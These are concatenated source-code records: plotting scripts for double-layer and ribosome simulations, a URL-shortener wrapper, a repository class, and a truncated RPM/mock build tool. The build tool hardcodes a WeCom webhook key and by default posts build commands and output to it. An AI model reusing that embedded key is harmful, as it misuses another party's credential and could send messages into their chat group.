async def unfiltered_iter(self):\n for item in self.data:\n yield item\n\n async def contains(self, item):\n return item in self.data\n\n async def delete(self, job):\n del 
self.data[job]\n","repo_name":"rhelmot/pydatatask","sub_path":"pydatatask/repository.py","file_name":"repository.py","file_ext":"py","file_size_in_byte":39077,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"16"}
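A minimal usage sketch of the in-process metadata repository defined in the record above, assuming the pydatatask package (and the third-party libraries its repository module imports) is installed; the job key and payload are made up.

import asyncio

from pydatatask.repository import InProcessMetadataRepository


async def main():
    repo = InProcessMetadataRepository()
    await repo.dump("job1", {"status": "ok"})   # store structured metadata under a job key
    print(await repo.info("job1"))              # -> {'status': 'ok'}
    print([job async for job in repo])          # -> ['job1'] (keys filtered by is_valid_job_id)
    await repo.delete("job1")
    print(await repo.contains("job1"))          # -> False


asyncio.run(main())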
+{"seq_id":"4158333907","text":"\"\"\"\nMaking Gouy-Chapman-Stern theory plots for introduction\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib import rcParams\nimport matplotlib.transforms as mtransforms\n\nfrom edl import models\n\nrcParams[\"lines.linewidth\"] = 0.75\nrcParams[\"font.size\"] = 8\nrcParams[\"axes.linewidth\"] = 0.5\nrcParams[\"xtick.major.width\"] = 0.5\nrcParams[\"ytick.major.width\"] = 0.5\n\npotentials = np.linspace(-1, 1, 200)\n\nmodel = models.AqueousVariableStern(100e-3, 6, 6, 6, 6)\nsweep = model.potential_sweep(potentials, tol=1e-3)\n\nfig = plt.figure(figsize=(5, 2))\nax1 = fig.add_subplot(121)\nax2 = fig.add_subplot(122)\n\nax1.plot(\n sweep[\"phi0\"],\n sweep[\"charge\"] * 100,\n label=\"Cont.\",\n color=\"black\",\n)\nax2.plot(sweep[\"phi0\"], sweep[\"capacity\"] * 100, color=\"black\")\n\ncomsol_neg = np.loadtxt(\"comsol_data/70nm_nano_electrode_charge_neg.txt\")\ncomsol_pos = np.loadtxt(\"comsol_data/70nm_nano_electrode_charge_pos.txt\")\nchg_neg = comsol_neg[:, 1] / model.kappa_debye**2 / (35e-9) ** 2 / np.pi\nchg_pos = (\n (comsol_pos[:, 1] - comsol_pos[0, 1] + comsol_neg[0, 1])\n / model.kappa_debye**2\n / (35e-9) ** 2\n / np.pi\n)\nphi = np.concatenate([comsol_neg[::-1, 0], comsol_pos[:, 0]], axis=0)\nchg = np.concatenate([chg_neg[::-1], chg_pos], axis=0)\ncap = np.gradient(chg_neg[::-1], comsol_neg[::-1, 0])\n\nax1.plot(phi, chg, \"k--\", label=\"70nm\")\nax2.plot(comsol_neg[::-1, 0], cap, \"k--\")\nax1.set_xlim([-1, 1])\nax1.set_ylabel(r\"$\\sigma$ / $\\mu$C cm$^{-2}$\")\nax1.set_xlabel(r\"$\\phi_0$ / V\")\nax2.set_xlabel(r\"$\\phi_0$ / V\")\nax1.legend(frameon=False)\nax2.set_ylabel(r\"$C$ / $\\mu$F cm$^{-2}$\")\nax2.set_xlim([-1, 0])\nax2.set_ylim([0, 100])\n\nlabels = [\"(a)\", \"(b)\", \"(c)\", \"(d)\", \"(e)\", \"(f)\"]\nfor label, axis in zip(labels, fig.axes):\n # label physical distance to the left and up:\n trans = mtransforms.ScaledTranslation(-25 / 72, 10 / 72, fig.dpi_scale_trans)\n axis.text(\n 0.0,\n 1.0,\n label,\n transform=axis.transAxes + trans,\n fontsize=\"medium\",\n va=\"bottom\",\n )\n\nplt.tight_layout()\nplt.savefig(\"figures/comsol-cap.pdf\")\nplt.show()\n","repo_name":"lucasdekam/double-layer-modelling","sub_path":"plot_comsol_data.py","file_name":"plot_comsol_data.py","file_ext":"py","file_size_in_byte":2090,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"35862450544","text":"\"\"\"\nPlots ribosome capacity\n\"\"\"\n\nfrom __future__ import absolute_import, division, print_function\n\nfrom six.moves import cPickle\n\nfrom matplotlib import pyplot as plt\nimport numpy as np\nimport os\n\nfrom models.ecoli.analysis import singleAnalysisPlot\nfrom wholecell.analysis.analysis_tools import exportFigure\nfrom wholecell.analysis.analysis_tools import read_bulk_molecule_counts\nfrom wholecell.io.tablereader import TableReader\nfrom wholecell.utils import units\n\nFONT = {\n\t'size':\t8\n\t}\n\n\nclass Plot(singleAnalysisPlot.SingleAnalysisPlot):\n\tdef do_plot(self, simOutDir, plotOutDir, plotOutFileName, simDataFile, validationDataFile, metadata):\n\t\twith open(simDataFile, 'rb') as f:\n\t\t\tsim_data = cPickle.load(f)\n\n\t\t# Load data from KB\n\t\tnAvogadro = sim_data.constants.n_avogadro\n\n\t\t# Listeners used\n\t\tunique_molecules_reader = TableReader(os.path.join(simOutDir, \"UniqueMoleculeCounts\"))\n\t\tmain_reader = TableReader(os.path.join(simOutDir, \"Main\"))\n\t\tribosome_reader = TableReader(os.path.join(simOutDir, \"RibosomeData\"))\n\n\t\t# Get IDs of ribosome subunits\n\t\tribosome_subunit_ids = [\n\t\t\tsim_data.molecule_ids.s50_full_complex,\n\t\t\tsim_data.molecule_ids.s30_full_complex,\n\t\t\t]\n\n\t\t# Get masses of full ribosomes and subunits\n\t\tribosome_subunit_masses = sim_data.getter.get_masses(ribosome_subunit_ids)\n\t\tfull_ribosome_mass = units.sum(ribosome_subunit_masses)\n\n\t\t# Read time data\n\t\tinitial_time = main_reader.readAttribute(\"initialTime\")\n\t\ttime = main_reader.readColumn(\"time\") - initial_time\n\t\ttimeStep = main_reader.readColumn(\"timeStepSec\")\n\n\t\t# Calculate the elongation rate for the given condition\n\t\tnutrients = sim_data.conditions[sim_data.condition][\"nutrients\"]\n\t\telongation_rate = sim_data.process.translation.ribosomeElongationRateDict[nutrients].asNumber(units.aa/units.s)\n\n\t\t# Load ribosome data\n\t\tactual_elongations = ribosome_reader.readColumn(\"actualElongations\")\n\t\tactual_elongation_rate = actual_elongations / timeStep\n\n\t\t# Load counts of subunits and active ribosomes\n\t\t(ribosome_subunit_counts, ) = read_bulk_molecule_counts(\n\t\t\tsimOutDir, (ribosome_subunit_ids, ))\n\t\tactive_ribosome_index = unique_molecules_reader.readAttribute(\"uniqueMoleculeIds\").index('active_ribosome')\n\t\tactive_ribosome_counts = unique_molecules_reader.readColumn(\"uniqueMoleculeCounts\")[:, active_ribosome_index]\n\n\t\t# Calculate statistics\n\t\ttotal_ribosome_counts = active_ribosome_counts + ribosome_subunit_counts.min(axis=1)\n\t\ttotal_ribosome_capacity = total_ribosome_counts * elongation_rate\n\n\t\tfree_subunit_mass = (\n\t\t\t(ribosome_subunit_masses * ribosome_subunit_counts / nAvogadro).asNumber(units.fg)\n\t\t\t).sum(axis=1)\n\t\tactive_ribosome_mass = (full_ribosome_mass * active_ribosome_counts / nAvogadro).asNumber(units.fg)\n\t\ttotal_ribosome_mass = free_subunit_mass + active_ribosome_mass\n\t\tmass_fraction_active = active_ribosome_mass / total_ribosome_mass\n\n\t\tplt.figure(figsize = (8.5, 15))\n\t\tplt.rc('font', **FONT)\n\n\t\tribosomeCapacity_axis = plt.subplot(6,1,1)\n\t\tribosomeCapacity_axis.plot(\n\t\t\ttime / 60., total_ribosome_capacity,\n\t\t\tlabel=\"Theoretical total ribosome rate\", linewidth=2, color='b')\n\t\tribosomeCapacity_axis.plot(\n\t\t\ttime / 60., actual_elongation_rate,\n\t\t\tlabel=\"Actual elongation rate\", linewidth=2, color='r')\n\t\tribosomeCapacity_axis.set_ylabel(\"Total amino acid\\npolymerization 
rate\\n(AA/s)\")\n\t\tribosomeCapacity_axis.legend(ncol=2)\n\n\t\tactiveRibosomeCapacity_axis = plt.subplot(6,1,2)\n\t\tactiveRibosomeCapacity_axis.plot(\n\t\t\ttime / 60., active_ribosome_counts * elongation_rate,\n\t\t\tlabel=\"Theoretical active ribosome rate\", linewidth=2, color='b')\n\t\tactiveRibosomeCapacity_axis.plot(\n\t\t\ttime / 60., actual_elongation_rate,\n\t\t\tlabel=\"Actual elongation rate\", linewidth=2, color='r')\n\t\tactiveRibosomeCapacity_axis.set_ylabel(\"Total amino acid\\npolymerization rate\\n(AA/s)\")\n\t\tactiveRibosomeCapacity_axis.legend(ncol=2)\n\n\t\tinactiveRibosomeCapacity_axis = plt.subplot(6,1,3)\n\t\tinactiveRibosomeCapacity_axis.plot(\n\t\t\ttime / 60., ribosome_subunit_counts.min(axis=1) * elongation_rate,\n\t\t\tlabel=\"Theoretical inactive ribosome rate\", linewidth=2, color='b')\n\t\tinactiveRibosomeCapacity_axis.set_ylabel(\"Total amino acid\\npolymerization rate\\n(AA/s)\")\n\t\tinactiveRibosomeCapacity_axis.legend(ncol=2)\n\n\t\tfractionalCapacity_axis = plt.subplot(6,1,4)\n\t\tfractionalCapacity_axis.plot(\n\t\t\ttime / 60., actual_elongation_rate / total_ribosome_capacity,\n\t\t\tlinewidth=2, color='k')\n\t\tfractionalCapacity_axis.set_ylabel(\"Fraction of total ribosome capacity used\")\n\n\t\teffectiveElongationRate_axis = plt.subplot(6,1,5)\n\t\teffectiveElongationRate_axis.plot(\n\t\t\ttime / 60., actual_elongation_rate / active_ribosome_counts,\n\t\t\tlinewidth=2, color='k')\n\t\teffectiveElongationRate_axis.set_ylabel(\"Relative elongation rate (aa/s/ribosome)\")\n\n\t\tfractionActive_axis = plt.subplot(6,1,6)\n\t\tfractionActive_axis.plot(\n\t\t\ttime / 60., mass_fraction_active,\n\t\t\tlinewidth=2, color='k')\n\t\tfractionActive_axis.set_ylabel(\"Mass fraction of active ribosomes\")\n\t\tfractionActive_axis.set_yticks(np.arange(0., 1.1, 0.1))\n\n\t\t# Save\n\t\tplt.tight_layout()\n\t\texportFigure(plt, plotOutDir, plotOutFileName, metadata)\n\t\tplt.close(\"all\")\n\n\nif __name__ == \"__main__\":\n\tPlot().cli()\n","repo_name":"CovertLab/WholeCellEcoliRelease","sub_path":"models/ecoli/analysis/single/ribosomeCapacity.py","file_name":"ribosomeCapacity.py","file_ext":"py","file_size_in_byte":5132,"program_lang":"python","lang":"en","doc_type":"code","stars":53,"dataset":"github-code","pt":"16"}
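A small numpy sketch of the counting convention in the record above: inactive ribosomes are limited by the scarcer of the two free subunits (a column-wise min), and theoretical capacity scales the total count by the condition's elongation rate. All numbers here are made up.

import numpy as np

active = np.array([900, 950, 1000])                      # active ribosomes per time step
subunits = np.array([[120, 80], [110, 95], [90, 100]])   # free [50S, 30S] subunit counts
elongation_rate = 17.0                                    # aa / s (illustrative)

total_ribosomes = active + subunits.min(axis=1)
print(total_ribosomes * elongation_rate)                  # theoretical polymerization rate, aa / s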
+{"seq_id":"3633861828","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n# is gd api wrapper\n\nimport urllib\nimport requests\n\nclass IsGd:\n \n API_URL = 'http://is.gd/api.php?longurl='\n \n def shorten(self,uri):\n resp = requests.get(self.API_URL+urllib.quote(uri), timeout=30)\n if resp:\n return resp\n else:\n return False","repo_name":"starenka/ara","sub_path":"isgd.py","file_name":"isgd.py","file_ext":"py","file_size_in_byte":346,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"29143123756","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\n\"\"\"\n Authors:\n yifengyou <842056007@qq.com>\n\"\"\"\n\nimport argparse\nimport datetime\nimport glob\nimport json\nimport logging\nimport os\nimport os.path\nimport re\nimport subprocess\nimport sys\nimport time\nfrom logging.handlers import RotatingFileHandler\n\nimport requests\nimport select\n\nCURRENT_VERSION = \"0.1.0\"\nlogger = None\ntimestamp = datetime.datetime.now().strftime(\"%Y-%m-%d_%H%M%S\")\nmsg_token = \"4155d89f-0b1c-44a8-8411-4f40c1d95795\"\n\n\ndef timer(func):\n def wrapper(*args, **kwargs):\n start = time.time()\n result = func(*args, **kwargs)\n end = time.time()\n elapsed = end - start\n logger.info(f\"{func.__name__} took {elapsed} seconds\")\n return result\n\n return wrapper\n\n\nclass Wecom():\n \"\"\"\n 企业微信群聊机器人,官方文档:https://developer.work.weixin.qq.com/document/path/91770\n \"\"\"\n\n def __init__(self, key=None):\n if key is None:\n raise Exception(\" wecom api key is None \")\n self._key = key\n\n def do_send(self, data):\n res = None\n headers = {'Content-Type': 'application/json'}\n url = f'https://qyapi.weixin.qq.com/cgi-bin/webhook/send?key={self._key}'\n r = requests.post(url=url, headers=headers, data=json.dumps(data))\n try:\n res = json.loads(r.text)\n except:\n pass\n if r.status_code == 200 and res and 'errcode' in res and 0 == res['errcode']:\n logger.info('* wecomBot send msg success')\n else:\n logger.info('* wecomBot send msg failed!')\n logger.info(r.text)\n\n def send_markdown(self, msg):\n data = {\n \"msgtype\": \"markdown\",\n \"markdown\": {\n \"content\": msg,\n },\n }\n self.do_send(data)\n\n\ndef init_logger(args):\n global logger, timestamp\n logger = logging.getLogger(\"mbuild\")\n console_handler = logging.StreamHandler(sys.stderr)\n console_handler.setFormatter(logging.Formatter('%(asctime)s [%(levelname)s] %(name)s: %(message)s'))\n logger.addHandler(console_handler)\n logfile = os.path.join(args.workdir,\n \"mbuild_\" + timestamp\n )\n file_handler = RotatingFileHandler(\n filename=logfile,\n encoding='UTF-8',\n maxBytes=1024000,\n backupCount=10\n )\n file_handler.setFormatter(logging.Formatter('%(asctime)s [%(levelname)s] %(name)s: %(message)s'))\n logger.addHandler(file_handler)\n logger.setLevel(logging.INFO)\n\n\ndef check_python_version():\n current_python = sys.version_info[0]\n if current_python == 3:\n return\n else:\n raise Exception('Invalid python version requested: %d' % current_python)\n\n\ndef do_exe_cmd(cmd, print_output=False, shell=False):\n stdout_output = ''\n stderr_output = ''\n if isinstance(cmd, str):\n cmd = cmd.split()\n elif isinstance(cmd, list):\n pass\n else:\n raise Exception(\"unsupported type when run do_exec_cmd\", type(cmd))\n\n # print(\"Run cmd:\" + \" \".join(cmd))\n p = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=shell)\n while True:\n # 使用select模块,监控stdout和stderr的可读性,设置超时时间为0.1秒\n rlist, _, _ = select.select([p.stdout, p.stderr], [], [], 0.1)\n # 遍历可读的文件对象\n for f in rlist:\n # 读取一行内容,解码为utf-8\n line = f.readline().decode('utf-8').strip()\n # 如果有内容,判断是stdout还是stderr,并打印到屏幕,并刷新缓冲区\n if line:\n if f == p.stdout:\n if print_output == True:\n print(\"STDOUT\", line)\n stdout_output += line + '\\n'\n sys.stdout.flush()\n elif f == p.stderr:\n if print_output == True:\n print(\"STDERR\", line)\n stderr_output += line + '\\n'\n sys.stderr.flush()\n else:\n print(\"UNKOWN:\", line)\n if p.poll() is not None:\n break\n return p.returncode, stdout_output, stderr_output\n\n\ndef 
do_sendmsg(args, ret=0, stdout=\"\", stderr=\"\", extra=\"\"):\n if not args.quiet:\n msg_sender = Wecom(key=msg_token)\n format_msg = f\"# mbuild消息播报:\\n\" \\\n f\"命令 : {' '.join(sys.argv)}\\n\" \\\n f\"返回值 : {ret}\\n\" \\\n f\"输出 : {stdout}\\n\" \\\n f\"错误 : {stderr}\\n\" \\\n f\"附加 : {extra}\\n\" \\\n f\"开始时间 : {timestamp}\\n\" \\\n f\"结束时间 : {datetime.datetime.now().strftime('%Y-%m-%d_%H%M%S')}\"\n msg_sender.send_markdown(msg=format_msg)\n\n\ndef handle_stat(args):\n pass\n\n\ndef rpmbuild_per_srpm(srpm):\n # 获取srpm名称 N-V-R\n ret, srpm_name, stderr = do_exe_cmd([\"rpm\", \"-qp\", \"--queryformat\", \"%{NAME}\", srpm], print_output=True)\n if ret != 0:\n logger.error(f\" query srpm file ret is not zero [{ret}] {stderr}\")\n return\n srpm_name = srpm_name.strip()\n logger.info(f\"srpm name : [{srpm_name}]\")\n\n # 创建构建目录\n topdir = os.path.dirname(srpm)\n mbuilddir = os.path.join(topdir, srpm_name)\n if not os.path.exists(mbuilddir):\n os.makedirs(mbuilddir, exist_ok=True)\n logger.info(f\"mbuild dir : {mbuilddir}\")\n rpmbuilddir = os.path.join(mbuilddir, \"rpmbuild_\" + timestamp)\n if not os.path.exists(mbuilddir):\n os.makedirs(rpmbuilddir, exist_ok=True)\n logger.info(f\"rpmbuild dir : {rpmbuilddir}\")\n\n ret, stdout, stderr = do_exe_cmd(\n [\"rpm\", \"-ivh\", \"--define\", f\"_topdir {rpmbuilddir}\", f\"{srpm}\"],\n print_output=True\n )\n if ret != 0:\n # logger.error(f\" install srpm {srpm} to {rpmbuilddir} failed! [{ret}] {stderr}\")\n errorlog = os.path.join(mbuilddir, \"mbuild_srpminstall_err.log_\" + timestamp)\n with open(errorlog, 'w') as fd:\n fd.write(stdout)\n fd.write(stderr)\n return\n # 检查spec\n specs = glob.glob(f\"{rpmbuilddir}/SPECS/*.spec\")\n if len(specs) == 0:\n logger.error(f\"no specs found!\")\n return\n elif len(specs) > 1:\n logger.error(f\"found spec more than one [{len(specs)}]\")\n return\n spec = os.path.abspath(specs[0])\n logger.info(f\"using spec {spec}\")\n\n # 导出rpm -qa记录\n ret, stdout, stderr = do_exe_cmd([\"rpm\", \"-qa\"], print_output=False)\n if ret != 0:\n # logger.error(f\" query all rpm failed! [{ret}] {stderr}\")\n errorlog = os.path.join(mbuilddir, \"mbuild_rpmqa_err.log_\" + timestamp)\n with open(errorlog, 'w') as fd:\n fd.write(stdout)\n fd.write(stderr)\n return\n rpm_manifest = os.path.join(mbuilddir, \"mbuild_rpm-manifest_\" + timestamp)\n with open(rpm_manifest, 'w') as fd:\n fd.write(stdout)\n\n # 安裝依赖\n ret, stdout, stderr = do_exe_cmd([\"yum\", \"builddep\", \"-y\", spec], print_output=True)\n if ret != 0:\n # logger.error(f\" yum builddep failed! [{ret}] {stderr}\")\n errorlog = os.path.join(mbuilddir, \"mbuild_builddep_err.log_\" + timestamp)\n with open(errorlog, 'w') as fd:\n fd.write(stdout)\n fd.write(stderr)\n return\n buildlog = os.path.join(mbuilddir, \"mbuild_builddep.log_\" + timestamp)\n with open(buildlog, 'w') as fd:\n fd.write(stdout)\n\n # rpmbuild编译\n ret, stdout, stderr = do_exe_cmd(\n [\"rpmbuild\", \"--define\", f\"_topdir {rpmbuilddir}\", \"-ba\", f\"{spec}\", \"--nocheck\"],\n print_output=True)\n if ret != 0:\n # logger.error(f\" rpmbuild failed! 
[{ret}] {stderr}\")\n errorlog = os.path.join(mbuilddir, \"mbuild_build_err.log_\" + timestamp)\n with open(errorlog, 'w') as fd:\n fd.write(stdout)\n fd.write(stderr)\n return\n buildlog = os.path.join(mbuilddir, \"mbuild_rpmbuild.log_\" + timestamp)\n with open(buildlog, 'w') as fd:\n fd.write(stdout)\n\n\n@timer\ndef handle_build(args):\n if not os.path.exists(args.workdir) or not os.path.isdir(args.workdir):\n print(f\"{args.workdir} is not a valid directory\")\n exit(1)\n\n workdir = os.path.abspath(args.workdir)\n init_logger(args)\n logger.info(f\"workdir: {workdir}\")\n\n if args.srpm and len(args.srpm) > 0:\n total = len(args.srpm)\n for index, srpm in enumerate(args.srpm):\n if not os.path.exists(srpm) or not os.path.isfile(srpm):\n logger.error(f\"{srpm} is not a valid srpm file\")\n exit(1)\n srpm_path = os.path.abspath(srpm)\n logger.info(f\"[{index + 1}/{total}] build {srpm}\")\n rpmbuild_per_srpm(srpm_path)\n else:\n srpms = glob.glob(f\"{args.workdir}/*.src.rpm\")\n if not srpms:\n logger.error(f\"No src.rpm found in {args.workdir}\")\n exit(1)\n total = len(srpms)\n for index, srpm in enumerate(srpms):\n srpm_path = os.path.abspath(srpm)\n logger.info(f\"[{index + 1}/{total}] build {srpm}\")\n rpmbuild_per_srpm(srpm_path)\n\n if not args.quiet:\n msg_sender = Wecom(key=msg_token)\n format_msg = f\"# mbuild消息播报:\\n\" \\\n f\"命令 : {' '.join(sys.argv)}\\n\" \\\n f\"开始时间 : {timestamp}\\n\" \\\n f\"结束时间 : {datetime.datetime.now().strftime('%Y-%m-%d_%H%M%S')}\"\n msg_sender.send_markdown(msg=format_msg)\n\n\n@timer\ndef handle_localinstall(args):\n if not os.path.exists(args.workdir) or not os.path.isdir(args.workdir):\n print(f\"{args.workdir} is not a valid directory\")\n exit(1)\n\n workdir = os.path.abspath(args.workdir)\n init_logger(args)\n logger.info(f\"workdir: {workdir}\")\n\n if not args.srpm:\n logger.error(f\" must specific target srpm\")\n\n if not os.path.exists(args.srpm) or not os.path.isfile(args.srpm):\n logger.error(f\"{args.srpm} is not a valid srpm file\")\n exit(1)\n srpm_path = os.path.abspath(args.srpm)\n\n ret, stdout, stderr = do_exe_cmd(\n [\"rpm\", \"-ivh\", \"--define\", f\"_topdir {workdir}\", f\"{srpm_path}\"],\n print_output=True\n )\n if ret != 0:\n # logger.error(f\" install srpm {srpm} to {rpmbuilddir} failed! 
[{ret}] {stderr}\")\n errorlog = os.path.join(workdir, \"mbuild_srpminstall_err.log_\" + timestamp)\n with open(errorlog, 'w') as fd:\n fd.write(stdout)\n fd.write(stderr)\n return\n else:\n logger.info(f\"localinstall {srpm_path} success!\")\n\n if not args.quiet:\n msg_sender = Wecom(key=msg_token)\n format_msg = f\"# mbuild消息播报:\\n\" \\\n f\"命令 : {' '.join(sys.argv)}\\n\" \\\n f\"开始时间 : {timestamp}\\n\" \\\n f\"结束时间 : {datetime.datetime.now().strftime('%Y-%m-%d_%H%M%S')}\"\n msg_sender.send_markdown(msg=format_msg)\n\n\n@timer\ndef handle_localbuild(args):\n \"\"\"\n 编译指定目录\n :param args:\n :return:\n \"\"\"\n if not os.path.exists(args.workdir) or not os.path.isdir(args.workdir):\n print(f\"{args.workdir} is not a valid directory\")\n exit(1)\n\n workdir = os.path.abspath(args.workdir)\n init_logger(args)\n logger.info(f\"workdir: {workdir}\")\n\n # 检查工作目录是否为rpmbuild目录(包含SOURCES、SPECS)\n if not os.path.exists(os.path.join(workdir, \"SOURCES\")) or not os.path.exists(os.path.join(workdir, \"SPECS\")):\n logger.error(f\"No SOURCES or SPECS dir found in {workdir}\")\n return\n\n # 检查spec,获取SPEC绝对路径spec\n specs = glob.glob(f\"{workdir}/SPECS/*.spec\")\n if len(specs) == 0:\n logger.error(f\"no specs found!\")\n return\n elif len(specs) > 1:\n logger.error(f\"found spec more than one [{len(specs)}]\")\n return\n spec = os.path.abspath(specs[0])\n logger.info(f\"using spec {spec}\")\n\n # 导出rpm -qa记录\n ret, stdout, stderr = do_exe_cmd([\"rpm\", \"-qa\"], print_output=False)\n if ret != 0:\n # logger.error(f\" query all rpm failed! [{ret}] {stderr}\")\n errorlog = os.path.join(workdir, \"mbuild_rpmqa_err.log_\" + timestamp)\n with open(errorlog, 'w') as fd:\n fd.write(stdout)\n fd.write(stderr)\n return\n rpm_manifest = os.path.join(workdir, \"mbuild_rpm-manifest_\" + timestamp)\n with open(rpm_manifest, 'w') as fd:\n fd.write(stdout)\n\n # 安裝依赖\n ret, stdout, stderr = do_exe_cmd([\"yum\", \"builddep\", \"-y\", spec], print_output=True)\n if ret != 0:\n # logger.error(f\" yum builddep failed! [{ret}] {stderr}\")\n errorlog = os.path.join(workdir, \"mbuild_builddep_err.log_\" + timestamp)\n with open(errorlog, 'w') as fd:\n fd.write(stdout)\n fd.write(stderr)\n return\n buildlog = os.path.join(workdir, \"mbuild_builddep.log_\" + timestamp)\n with open(buildlog, 'w') as fd:\n fd.write(stdout)\n fd.write(stderr)\n\n # rpmbuild编译\n ret, stdout, stderr = do_exe_cmd(\n [\"rpmbuild\", \"--define\", f\"_topdir {workdir}\", \"-ba\", f\"{spec}\", \"--nocheck\"],\n print_output=True\n )\n if ret != 0:\n # logger.error(f\" rpmbuild failed! [{ret}] {stderr}\")\n errorlog = os.path.join(workdir, \"mbuild_build_err.log_\" + timestamp)\n with open(errorlog, 'w') as fd:\n fd.write(stdout)\n fd.write(stderr)\n return\n buildlog = os.path.join(workdir, \"mbuild_rpmbuild.log_\" + timestamp)\n with open(buildlog, 'w') as fd:\n fd.write(stdout)\n fd.write(stderr)\n\n if not args.quiet:\n msg_sender = Wecom(key=msg_token)\n format_msg = f\"# mbuild消息播报:\\n\" \\\n f\"命令 : {' '.join(sys.argv)}\\n\" \\\n f\"开始时间 : {timestamp}\\n\" \\\n f\"结束时间 : {datetime.datetime.now().strftime('%Y-%m-%d_%H%M%S')}\"\n msg_sender.send_markdown(msg=format_msg)\n\n\ndef handle_clean(args):\n if not os.path.exists(args.workdir) or not os.path.isdir(args.workdir):\n print(f\"{args.workdir} is not a valid directory\")\n exit(1)\n\n workdir = os.path.abspath(args.workdir)\n print(f\"workdir: {workdir}\")\n\n # 检查spec\n logs = glob.glob(f\"{workdir}/mbuild_*\")\n if len(logs) == 0:\n print(f\"no mbuild log found! 
bye~\")\n return\n for l in logs:\n if os.path.isfile(l):\n os.remove(l)\n print(f\"delete {l} done!\")\n print(f\"clean done\")\n\n\ndef mockbuild_per_srpm(args, srpm):\n srpm_path = os.path.abspath(srpm)\n\n # 选择输出目录\n if not args.output:\n # 获取srpm名称 N-V-R\n ret, srpm_name, stderr = do_exe_cmd(\n [\"rpm\", \"-qp\", \"--nosignature\", \"--nodigest\", \"--queryformat\", \"%{NAME}\", srpm_path],\n print_output=False\n )\n if ret != 0:\n msg = f\" query srpm file ret is not zero [{ret}] {stderr}\"\n logger.error(msg)\n do_sendmsg(args, ret=-1, stderr=msg)\n return\n srpm_name = srpm_name.strip()\n logger.info(f\"srpm name : [{srpm_name}]\")\n\n # 创建构建目录\n topdir = os.path.dirname(srpm_path)\n output_dir = os.path.join(topdir, srpm_name)\n if not os.path.exists(output_dir):\n os.makedirs(output_dir, exist_ok=True)\n logger.info(f\"output_dir dir : {output_dir}\")\n else:\n try:\n os.makedirs(args.output, exist_ok=True)\n except Exception as e:\n msg = f\"failed to create {args.output}\"\n logger.error(msg)\n do_sendmsg(args, ret=-1, stderr=msg)\n exit(1)\n output_dir = args.output\n\n if not args.root:\n root = \"rocky-8-x86_64\"\n else:\n root = args.root\n\n # mock编译\n cmd = [\n \"/usr/bin/mock\",\n \"--root\", f\"{root}\",\n \"--rebuild\", f\"{srpm_path}\",\n \"--resultdir\", f\"{output_dir}\",\n \"--verbose\"\n ]\n logger.info(f\"run cmd {' '.join(cmd)}\")\n ret, stdout, stderr = do_exe_cmd(cmd, print_output=True, shell=False)\n if ret != 0:\n # logger.error(f\" rpmbuild failed! [{ret}] {stderr}\")\n errorlog = os.path.join(output_dir, \"mbuild_mock_err.log_\" + timestamp)\n with open(errorlog, 'w') as fd:\n fd.write(stdout)\n fd.write(stderr)\n do_sendmsg(args, ret=ret)\n return\n buildlog = os.path.join(output_dir, \"mbuild_mock.log_\" + timestamp)\n with open(buildlog, 'w') as fd:\n fd.write(stdout)\n fd.write(stderr)\n\n\n@timer\ndef handle_mock(args):\n if not os.path.exists(args.workdir) or not os.path.isdir(args.workdir):\n print(f\"{args.workdir} is not a valid directory\")\n exit(1)\n\n workdir = os.path.abspath(args.workdir)\n init_logger(args)\n logger.info(f\"workdir: {workdir}\")\n\n if args.srpm:\n if not os.path.exists(args.srpm) or not os.path.isfile(args.srpm):\n logger.error(f\"{args.srpm} is not a valid srpm file\")\n exit(1)\n srpm_path = os.path.abspath(args.srpm)\n mockbuild_per_srpm(args, srpm_path)\n else:\n srpms = glob.glob(f\"{args.workdir}/*.src.rpm\")\n if not srpms:\n logger.error(f\"No src.rpm found in {args.workdir}\")\n exit(1)\n total = len(srpms)\n for index, srpm in enumerate(srpms):\n srpm_path = os.path.abspath(srpm)\n logger.info(f\"[{index + 1}/{total}] build {srpm}\")\n mockbuild_per_srpm(args, srpm_path)\n\n do_sendmsg(args)\n\n\ndef handle_check(args):\n if not os.path.exists(args.workdir) or not os.path.isdir(args.workdir):\n print(f\"{args.workdir} is not a valid directory\")\n exit(1)\n\n workdir = os.path.abspath(args.workdir)\n print(f\"workdir: {workdir}\")\n\n def find_rpm_files(dir_path):\n flag = False\n rpms = []\n for entry in os.scandir(dir_path):\n if entry.is_file() and entry.name.endswith(\".rpm\"):\n flag = True\n rpms.append(os.path.basename(entry.path))\n elif entry.is_dir():\n find_rpm_files(entry.path)\n if flag:\n print(f\"[+] {os.path.abspath(dir_path)}\")\n for r in rpms:\n print(f\"\\t[-] {r}\")\n\n find_rpm_files(workdir)\n\n\ndef main():\n global CURRENT_VERSION\n check_python_version()\n\n parser = argparse.ArgumentParser(add_help=False)\n parser.add_argument(\"-v\", \"--version\", action=\"store_true\",\n help=\"show 
program's version number and exit\")\n parser.add_argument(\"-h\", \"--help\", action=\"store_true\",\n help=\"show this help message and exit\")\n\n subparsers = parser.add_subparsers()\n\n # 定义base命令用于集成\n parent_parser = argparse.ArgumentParser(add_help=False, description=\"mbuild - a tool for kernel development\")\n parent_parser.add_argument(\"-V\", \"--verbose\", default=None, action=\"store_true\", help=\"show verbose output\")\n parent_parser.add_argument(\"-j\", \"--job\", default=os.cpu_count(), type=int, help=\"job count\")\n parent_parser.add_argument(\"-o\", \"--output\", default=None, help=\"output dir path\")\n parent_parser.add_argument(\"-w\", \"--workdir\", default=\".\", help=\"setup workdir\")\n parent_parser.add_argument('-d', '--debug', default=None, action=\"store_true\", help=\"enable debug output\")\n parent_parser.add_argument('-q', '--quiet', default=False, action=\"store_true\", help=\"keep quiet, no msg send\")\n\n # 添加子命令 stat\n parser_stat = subparsers.add_parser('stat', parents=[parent_parser])\n parser_stat.set_defaults(func=handle_stat)\n\n # 添加子命令 build\n parser_build = subparsers.add_parser('build', parents=[parent_parser])\n parser_build.add_argument('-s', '--srpm', nargs=\"+\", default=None, help=\"build specific srpm\")\n parser_build.set_defaults(func=handle_build)\n\n # 添加子命令 localinstall\n parser_localinstall = subparsers.add_parser('localinstall', parents=[parent_parser])\n 